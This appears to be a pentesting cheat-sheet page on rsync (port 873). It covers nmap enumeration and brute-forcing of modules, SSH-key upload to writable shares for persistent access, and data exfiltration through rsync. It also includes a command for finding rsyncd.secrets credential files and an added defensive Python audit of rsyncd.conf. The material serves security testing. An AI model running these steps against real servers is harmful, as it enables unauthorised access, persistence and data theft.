Rsync
Pentesting Rsync - TCP Port 873
Theory
Rsync is a utility for efficiently transferring and synchronizing files between a computer and an external hard drive, and across a network. By default it runs on TCP port 873.
Practice
Enumeration
To initiate a connection with an rsync server, use the rsync command followed by the rsync URL.
# The URL format is `[rsync://][user@]host[:port]/module`.
rsync rsync://user@target_host/
You can use Nmap to check if there's an Rsync server on a target host like this:
nmap -p 873 <IP>
We can then enumerate modules. This is a crucial enumeration phase for understanding the structure of the target rsync modules and finding misconfigurations or sensitive information.
nmap -sV --script "rsync-list-modules" -p 873 target_host
Exploiting
Be aware that some shares might be restricted to specific credentials, indicated by an "Access Denied" message. We can try to brute-force the password using the following command:
nmap -sV --script rsync-brute --script-args userdb=/var/usernames.txt,passdb=/var/passwords.txt -p 873 <IP>
Modules without proper authentication can be accessed by unauthorized users. This vulnerability allows attackers to read, modify, or delete sensitive data.
If a module is writable, and you have determined its path through enumeration, you can upload malicious files, potentially leading to remote command execution or pivoting into the network.
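Added example (not from the original page): a server-side audit that parses rsyncd.conf text and flags the module settings described above, namely modules with no `auth users`, modules with `read only` disabled, and modules with no `hosts allow`. The sample configuration, its module names and the function names are constructed for illustration.

```python
# Added example: flag weak module settings in rsyncd.conf text (defensive audit).
TRUE = {"yes", "true", "1"}
SAMPLE = """\
# constructed sample configuration, not taken from a real host
[backup]
path = /srv/backup
read only = no
[releases]
path = /srv/releases
auth users = deploy
secrets file = /etc/rsyncd.secrets
hosts allow = 10.0.0.0/24
list = no
"""

def parse_rsyncd_conf(text):
    """Return (global_params, {module: params}); keys lowercased, spaces removed."""
    globals_, modules, current = {}, {}, None
    for raw in text.splitlines():
        line = raw.strip()
        if line.startswith("[") and line.endswith("]"):
            current = modules.setdefault(line[1:-1].strip(), {})
        elif line and not line.startswith("#") and "=" in line:
            key, value = line.split("=", 1)  # only the first '=' is significant
            target = globals_ if current is None else current
            target["".join(key.lower().split())] = value.strip()
    return globals_, modules

def audit(text):
    """Map each module name to a list of findings (empty list: nothing flagged)."""
    globals_, modules = parse_rsyncd_conf(text)
    report = {}
    for name, params in modules.items():
        eff = {**globals_, **params}  # global section supplies module defaults
        anonymous = not eff.get("authusers")
        writable = eff.get("readonly", "yes").lower() not in TRUE  # default: yes
        checks = [
            (anonymous, "no 'auth users': module accepts anonymous clients"),
            (writable, "'read only' disabled: clients can upload or delete"),
            (anonymous and writable, "anonymous write access"),
            (not eff.get("hostsallow"), "no 'hosts allow': any address may connect"),
            (eff.get("list", "yes").lower() in TRUE, "module appears in listings"),
        ]
        report[name] = [msg for hit, msg in checks if hit]
    return report

if __name__ == "__main__":
    for module, findings in audit(SAMPLE).items():
        print(module, findings or "ok")
```

To audit a real daemon, pass the contents of its rsyncd.conf to `audit()`; the parser does not handle include directives or backslash line continuations.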
Post-Exploitation
Upload artifacts like modified scripts or binaries to maintain access:
rsync -av home_user/.ssh/ rsync://user@target_host/home_user/.ssh
Sensitive data identified during enumeration can be exfiltrated using rsync:
From Remote to Local
We can sync a remote folder with a local folder.
rsync -avz rsync://<IP>:873/share_name /local/directory/
# OR
rsync -avz <IP>::share_name /local/directory/
From Local to Remote
We can sync our local folder with a remote folder.
rsync -av /local/directory/ <IP>::share_name
# OR
rsync -av /local/directory/ rsync://<IP>:873/share_name
To locate the rsyncd configuration file and potentially find a secrets file containing usernames and passwords for rsyncd authentication, use the following command:
find /etc \( -name rsyncd.conf -o -name rsyncd.secrets \)
Resources